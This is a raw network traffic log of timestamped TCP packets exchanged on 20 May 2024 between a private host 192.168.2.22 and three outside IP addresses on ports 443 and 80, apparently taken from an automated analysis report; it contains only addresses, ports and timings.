                                May 20, 2024 08:53:40.086992979 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.086998940 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.087009907 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.087040901 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.087066889 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.089345932 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.089373112 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.089410067 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.089417934 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.089428902 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.089454889 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.089473963 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.092204094 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.092233896 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.092269897 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.092276096 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.092288017 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.092310905 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.092338085 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.094100952 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.094130039 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.094163895 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.094170094 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.094182014 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.094208956 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.094253063 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.096815109 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.096858025 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.096889019 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.096901894 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.096914053 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.096940994 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.096950054 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.098427057 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.098460913 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.098494053 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.098500013 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.098512888 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.098546028 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.098563910 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.099253893 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.099318981 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.099327087 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.099366903 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.282458067 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.282704115 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.283862114 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.283899069 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.283915043 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.283943892 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.283955097 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.283966064 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.283993959 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.284672976 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.284740925 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.285298109 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.285365105 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.286148071 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.286190987 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.286217928 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.286225080 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.286237001 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.286267996 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.287348986 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.287399054 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.287416935 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.287424088 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.287436008 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.287457943 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.287457943 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.288259029 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.288321972 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.289159060 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.289227962 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.290673018 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.290702105 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.290719032 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.290745974 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.290751934 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.290764093 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.290791035 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.538798094 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.538947105 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.538957119 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.538992882 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.539024115 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.539033890 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.539077044 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.557671070 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.557749987 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.557751894 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.557779074 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.557810068 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.557821989 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.557883978 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.572947979 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.573019028 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.573020935 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.573044062 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.573072910 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.573102951 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.573137999 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.583725929 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.583786011 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.583910942 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.583911896 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.583924055 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.583945990 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.583966017 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.737592936 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.737797976 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.779233932 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.779289961 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.779367924 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.779390097 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.779402971 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.779432058 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.779561996 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.791659117 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.791750908 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.797827959 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.797897100 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.809736013 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.809809923 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.815198898 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.815258980 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.825223923 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.825294018 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.834799051 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.834867001 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.839189053 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.839251041 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.847558975 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.847690105 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.851604939 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.851670980 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.862967968 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.863039017 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.866482019 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.866544962 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.873178005 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.873234987 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.874752998 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.874816895 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.881139040 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.881202936 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.887233019 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.887274981 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.887309074 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.887320995 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.887353897 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.887353897 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.889863968 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.889918089 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.895325899 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.895390987 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.948141098 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.948432922 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.950084925 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.950170040 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.951503992 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.951574087 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.954416990 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.954505920 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.955857992 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.955921888 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.958770990 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.958854914 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.960225105 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.960287094 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.967278004 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.967355967 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.967364073 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.967395067 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.967422009 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.967436075 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.968218088 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.968255997 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.968271971 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.968286037 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.968317032 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.972521067 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.972594023 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.972603083 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.972644091 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.972650051 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.972690105 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.973495960 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.973562002 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.974502087 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.974567890 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.977271080 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.977343082 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.978988886 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.979069948 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.980456114 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.980524063 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.982136011 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.982201099 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.983748913 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.983814001 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.984461069 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.984517097 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.986087084 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.986167908 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:40.986819983 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:40.986876011 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.171385050 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.171477079 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.171516895 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.171544075 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.171560049 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.171587944 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.171705008 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.173122883 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.173197031 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.390768051 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.390860081 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.390993118 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.391016960 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.391061068 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.391136885 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.393991947 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.394057035 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.394062042 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.394083977 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.394109964 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.394120932 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.394880056 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.394942999 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.394949913 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.394984961 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.395834923 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.395899057 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.398396015 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.398427963 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.398459911 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.398468018 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.398478031 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.398504019 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.398530960 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.401123047 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.401154041 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.401180029 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.401185036 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.401211023 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.401242971 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.401242971 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.403714895 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.403745890 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.403774977 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.403781891 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.403790951 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.403831005 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.403883934 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.404731035 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.404809952 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.404815912 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.404824972 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.404848099 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.404860973 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.405908108 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.405965090 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.406951904 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.406984091 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.407006979 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.407012939 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.407022953 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.407047987 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.407732964 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.407785892 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.408660889 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.408689022 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.408720970 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.408726931 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.408735991 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.408761024 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.606730938 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.606834888 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.608328104 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.608387947 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.610583067 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.610655069 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.610667944 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.610711098 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.612806082 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.612838984 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.612864017 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.612871885 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.612885952 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.612910032 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.612936974 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.613634109 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.613698959 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.613706112 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.613744974 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.614080906 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.614136934 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.614658117 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.614717007 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.615622997 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.615659952 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.615684986 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.615695953 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.615705967 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.615734100 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.616014004 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.616069078 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.616672039 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.616729975 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.616733074 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.616746902 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.616779089 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.619237900 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.619297981 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.829849005 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.829946041 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.830024958 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.830024958 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.830101013 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.830113888 CEST44349164104.21.74.191192.168.2.22
                                May 20, 2024 08:53:41.830122948 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:53:41.830162048 CEST49164443192.168.2.22104.21.74.191
                                May 20, 2024 08:54:20.382392883 CEST4916580192.168.2.2266.96.161.166
                                May 20, 2024 08:54:20.389661074 CEST804916566.96.161.166192.168.2.22
                                May 20, 2024 08:54:20.389738083 CEST4916580192.168.2.2266.96.161.166
                                May 20, 2024 08:54:20.390882015 CEST4916580192.168.2.2266.96.161.166
                                May 20, 2024 08:54:20.416165113 CEST804916566.96.161.166192.168.2.22
                                May 20, 2024 08:54:20.915453911 CEST804916566.96.161.166192.168.2.22
                                May 20, 2024 08:54:20.917538881 CEST804916566.96.161.166192.168.2.22
                                May 20, 2024 08:54:20.917766094 CEST4916580192.168.2.2266.96.161.166
                                May 20, 2024 08:54:20.918313026 CEST4916580192.168.2.2266.96.161.166
                                May 20, 2024 08:54:20.926152945 CEST804916566.96.161.166192.168.2.22
                                May 20, 2024 08:54:28.506664991 CEST4916680192.168.2.2245.33.6.223
                                May 20, 2024 08:54:28.541058064 CEST804916645.33.6.223192.168.2.22
                                May 20, 2024 08:54:28.541222095 CEST4916680192.168.2.2245.33.6.223
                                May 20, 2024 08:54:28.541707993 CEST4916680192.168.2.2245.33.6.223
                                May 20, 2024 08:54:28.557454109 CEST804916645.33.6.223192.168.2.22
                                May 20, 2024 08:54:29.088994026 CEST804916645.33.6.223192.168.2.22
                                May 20, 2024 08:54:29.089004040 CEST804916645.33.6.223192.168.2.22
                                May 20, 2024 08:54:29.089054108 CEST4916680192.168.2.2245.33.6.223
                                May 20, 2024 08:54:29.105802059 CEST4916680192.168.2.2245.33.6.223
                                May 20, 2024 08:54:29.113296032 CEST804916645.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.155488968 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.160594940 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.160660028 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.160804987 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.177855968 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.700171947 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.700248003 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.702236891 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.702285051 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.706986904 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.707031012 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.712115049 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.712131023 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.712168932 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.712186098 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.721599102 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.721647978 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.725428104 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.725444078 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.725492954 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.725509882 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:54:30.733045101 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:54:30.733062029 CEST804916745.33.6.223192.168.2.22
